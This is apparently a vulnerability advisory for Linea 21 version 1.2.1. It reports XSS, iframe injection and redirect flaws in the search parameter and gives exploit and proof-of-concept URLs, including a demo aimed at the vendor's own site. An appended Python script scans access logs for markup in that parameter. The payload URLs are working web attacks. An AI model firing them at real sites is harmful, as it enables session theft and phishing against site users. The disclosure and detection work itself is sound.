_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________

#[+] Linea 21 version 1.2.1 (search) XSS, Iframe Injection and Redirect Vulnerability
#[+]
#[+] Download : http://www.linea21.com/index.php/Actualites
#[+]
#[+] Discovered By 599eme Man
#[+]
#[+] Flouf@live.fr
#[------------------------------------------------------------------------------]
#
#
# [+] Exploit :
#
# http://site.com/public/index.php?search=[XSS/IFRAME/REDIRECT]&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider
#
# [+] P0C :
#
# http://site.com/public/index.php?search="'>&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider
#
# http://site.com/public/index.php?search=%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider
#
# http://site.com/public/index.php?search=&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider
#
#[------------------------------------------------------------------------------]
#
#
# [+] Demo :
#
# http://fr.linea21.com/public/index.php?search="'>&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider
#########################################################################################################
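
Added example, not part of the original advisory and not Linea 21 code: a log check a site operator could run to find requests that put markup into the `search` parameter of `/public/index.php`, the request shape shown above. The log lines are constructed samples with placeholder client addresses, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines; client IPs and timestamps are placeholders.
_Q = "&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider"
_T = "[01/Jan/2010:10:00:00 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 - - {_T} "GET /public/index.php?search=eau+potable{_Q} HTTP/1.1" 200 5120',
    f'192.0.2.11 - - {_T} "GET /public/index.php?search=%3Ciframe%20src=http://www.google.com'
    f'%3E%3C/iframe%3E{_Q} HTTP/1.1" 200 5300',
    f'192.0.2.12 - - {_T} "GET /public/index.php?search=%22%27%3E{_Q} HTTP/1.1" 200 5200',
    f'192.0.2.13 - - {_T} "GET /public/index.php?search=%253Ciframe%253E{_Q} HTTP/1.1" 200 5200',
    f'192.0.2.14 - - {_T} "GET /public/index.php?search=l%27eau{_Q} HTTP/1.1" 200 5100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Angle brackets have no place in a search term. Quotes alone are not flagged,
# because apostrophes are common in French queries ("l'eau"); a quote-only
# attribute breakout is therefore outside what this check covers.
MARKUP_RE = re.compile(r"[<>]")


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_search_values(lines, path="/public/index.php"):
    """Return (client, decoded search value) for requests carrying markup."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != path:
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("search", []):
            value = decode_fully(raw)
            if MARKUP_RE.search(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_search_values(SAMPLE_LOG):
        print(client, repr(value))
```

Hits from this check show which clients sent markup; the fix itself is HTML-encoding the search value wherever the results page writes it back into the response.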